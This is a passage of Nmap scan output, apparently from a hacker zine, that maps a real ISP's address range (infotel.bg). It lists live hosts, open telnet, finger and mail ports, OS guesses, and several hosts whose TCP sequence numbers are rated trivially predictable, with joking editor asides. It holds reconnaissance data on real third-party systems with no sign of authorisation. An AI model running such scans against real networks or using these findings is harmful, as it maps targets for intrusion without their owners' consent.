49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P),  Cisco 25XX/45XX Router or 29XX switch (IOS 11.2),  IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.114) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.114)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.114):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.115) appears to be down, skipping it.
Host vg.infotel.bg (212.39.64.116) appears to be up ... good.
Initiating SYN half-open stealth scan against vg.infotel.bg (212.39.64.116)
Adding TCP port 23 (state Open).
The SYN scan took 15 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 40117 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 42484 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38558 is closed and neither are firewalled
Interesting ports on vg.infotel.bg (212.39.64.116):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=13 (Easy)

Sequence numbers: 63B2ECBF 63B2ECBF 63B2F29B 63B2F4C1 63B2F7E1 63B2FEE9
No OS matches for this host.  TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=D)
TSeq(Class=TD%gcd=32%SI=3)
TSeq(Class=TD%gcd=32%SI=D)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)


Host unnamed.infotel.bg (212.39.64.117) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.127) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.127) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.128) appears to be down, skipping it.
Host pomps.infotel.bg (212.39.64.129) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.130) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.131) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.132) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.132)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.132):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host devact.infotel.bg (212.39.64.133) appears to be up ... good.
Initiating SYN half-open stealth scan against devact.infotel.bg (212.39.64.133)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact.infotel.bg (212.39.64.133):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host devact-1.infotel.bg (212.39.64.134) appears to be up ... good.
Initiating SYN half-open stealth scan against devact-1.infotel.bg (212.39.64.134)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact-1.infotel.bg (212.39.64.134):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host devact-2.infotel.bg (212.39.64.135) appears to be up ... good.
Initiating SYN half-open stealth scan against devact-2.infotel.bg (212.39.64.135)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on devact-2.infotel.bg (212.39.64.135):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.136) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.160) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.160) seems to be a subnet broadcast address (returned 3 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.161) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.161)

 <[ I cut about 300 of these things here... According to kay these are ICMP
 unreachable or some similar junk, but I can't be sure, because I was asleep
 at the time :) ]>

Here it is:
3  1  E  CA   0  0  0  0    45 0  0  28   74 ED 0  0
36 6  4D 4C   C2 C  EB C1   D4 27 40 A1   82 11 0  5
1C 6C 4F B2
Here it is:
3  1  E  5C   0  0  0  0    45 0  0  28   D2 88 0  0
36 6  EF B0   C2 C  EB C1   D4 27 40 A1   82 11 0  73
1C 6C 4F B2
Here it is:
3  1  E  92   0  0  0  0    45 0  0  28   FF 49 0  0
36 6  C2 EF   C2 C  EB C1   D4 27 40 A1   82 11 0  3D
1C 6C 4F B2
Here it is:
3  1  E  70   0  0  0  0    45 0  0  28   3C 0  0  0
36 6  86 39   C2 C  EB C1   D4 27 40 A1   82 11 0  5F
1C 6C 4F B2
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.161):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)

 <[ hellishly filtered ..... ]>

Host scifo.infotel.bg (212.39.64.162) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.163) appears to be down, skipping it.
Host dancho.infotel.bg (212.39.64.164) appears to be up ... good.
Initiating SYN half-open stealth scan against dancho.infotel.bg (212.39.64.164)

 <[ whoa, is this one that heavily filtered too? ]>

Here it is:
3  1  10 80   0  0  0  0    45 0  0  28   5  D3 0  0
36 6  BC 63   C2 C  EB C1   D4 27 40 A4   82 11 0  3F
5C B5 D  79
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on dancho.infotel.bg (212.39.64.164):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.165) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.166) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.166)

3  1  4A DC   0  0  0  0    45 0  0  28   F9 67 0  0
36 6  C8 CC   C2 C  EB C1   D4 27 40 A6   82 11 0  3D
DE 87 51 4C
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.166):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.167) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.167)
Here it is:

Here it is:
3  1  1C 97   0  0  0  0    45 0  0  28   12 32 0  0
36 6  B0 1    C2 C  EB C1   D4 27 40 A7   82 11 0  5F
59 E0 4  17
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.167):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.168) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.184) appears to be down, skipping it.
Host hpns.infotel.bg (212.39.64.185) appears to be up ... good.
Initiating SYN half-open stealth scan against hpns.infotel.bg (212.39.64.185)

Here it is:
3  1  7D A6   0  0  0  0    45 0  0  28   C2 D0 0  0
36 6  FF 50   C2 C  EB C1   D4 27 40 B9   82 11 0  3D
72 69 8A A0
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on hpns.infotel.bg (212.39.64.185):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.186) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.191) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.191) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.192) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.208) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.208) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.209) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.209)
Adding TCP port 23 (state Open).
The SYN scan took 10 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 36989 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43884 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 35286 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.209):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=1 (Trivial joke)

Sequence numbers: 63F21039 63F2138B 63F21615 63F218D1 63F21B8D 63F21E7B
No OS matches for this host.  TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=1)
TSeq(Class=TD%gcd=32%SI=6)
TSeq(Class=TD%gcd=32%SI=1)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)


Host unnamed.infotel.bg (212.39.64.210) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.210)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.210):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.211) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.211)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.211):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.212) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.212)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.212):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.213) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.222) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.222)
The SYN scan took 20 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.222):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.223) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.223) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.224) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.224) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.225) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.225)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.225):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.226) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.227) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.227)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.227):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.228) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.228)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.228):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.229) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.229)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.229):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.230) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.237) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.237)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.237):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.238) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.239) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.239) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.240) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.250) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.251) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.251)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.251):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.252) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.253) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.253)
Adding TCP port 76 (state Firewalled).

 <[ I cut all the firewall-ed ones here ]>

The SYN scan took 46 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41980 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 23 is open and port 43706 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 23 is open and port 35179 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.253):
(Not showing ports in state: filtered)
Port    State       Protocol  Service
23      open        tcp        telnet

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=762 (Medium)

Sequence numbers: 83E273B 83E2ECB 83E2ECB 83E3303 83E3303 83E3830
No OS matches for this host.  TCP fingerprints:
T1(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=MNNTNW)
TSeq(Class=RI%gcd=1%SI=2FA)
T2(Resp=N)
T1(Resp=N)
T3(Resp=N)
T2(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=N)
T5(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T6(Resp=N)
T5(Resp=N)
T7(Resp=N)
T6(Resp=N)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
T7(Resp=N)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ blahhh Pink elephant ..... ]>

 (Note by Iron - I really get a kick out of the pink elephants ;-)

Host unnamed.infotel.bg (212.39.64.254) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.254)
Adding TCP port 109 (state Open).
Adding TCP port 25 (state Open).
The SYN scan took 31 seconds to scan 120 ports.
For OSScan assuming that port 25 is open and port 40102 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 31708 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 34977 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.254):
Port    State       Protocol  Service
21      filtered    tcp        ftp
25      open        tcp        smtp
49      filtered    tcp        unknown
80      filtered    tcp        www
109     open        tcp        pop2
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=9082861 (Good luck!)

Sequence numbers: 319C93F5 319C93F5 30997AC3 30B0FA39 30CB399C 3216313B
No OS matches for this host.  TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=B9E8D)
TSeq(Class=RI%gcd=1%SI=C045D)
TSeq(Class=RI%gcd=1%SI=8A97ED)
T1(Resp=Y%DF=N%W=37FF%ACK=S++%Flags=AS%Ops=ME)
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=N)
T3(Resp=Y%DF=N%W=37FF%ACK=S++%Flags=ASF%Ops=ME)
T3(Resp=Y%DF=N%W=37FF%ACK=O%Flags=ASF%Ops=ME)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.255) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.255) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.0) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.0) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.1) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.1)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 12 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38687 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34532 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38432 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.1):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=107269 (Good luck!)

Sequence numbers: FCB6A390 FCC29F06 FCCBA98A FCD5E4E7 FCE1E087 FCEFAED4
No OS matches for this host.  TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=206AA)
TSeq(Class=RI%gcd=1%SI=9C915)
TSeq(Class=RI%gcd=1%SI=1A305)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.2) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.2)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 31 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 34976 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43700 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 43897 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.2):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=111526 (Good luck!)

Sequence numbers: 1BDE42A 1DD4865 1FC480C 21DC159 239F510 258491A
No OS matches for this host.  TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=192E5)
TSeq(Class=RI%gcd=1%SI=9B208)
TSeq(Class=RI%gcd=1%SI=1B3A6)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ pink elephant again .... ]>

 (Note by Iron - I get even more of a kick out of it ;-) This is probably the
 place to curse you out, ManiaX, for making me sit here reading this crap at
 1:30, because it has to be handed in urgently... Yeah :-) Consider yourself
 cursed out :-)

Host unnamed.infotel.bg (212.39.65.3) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.3)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 36820 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.3):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=92712 (Worthy challenge)

Sequence numbers: 4531BBC 462B6AE 470E99E 4822651 4922B7B 49F5CB8
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=16A28)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.4) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.4)
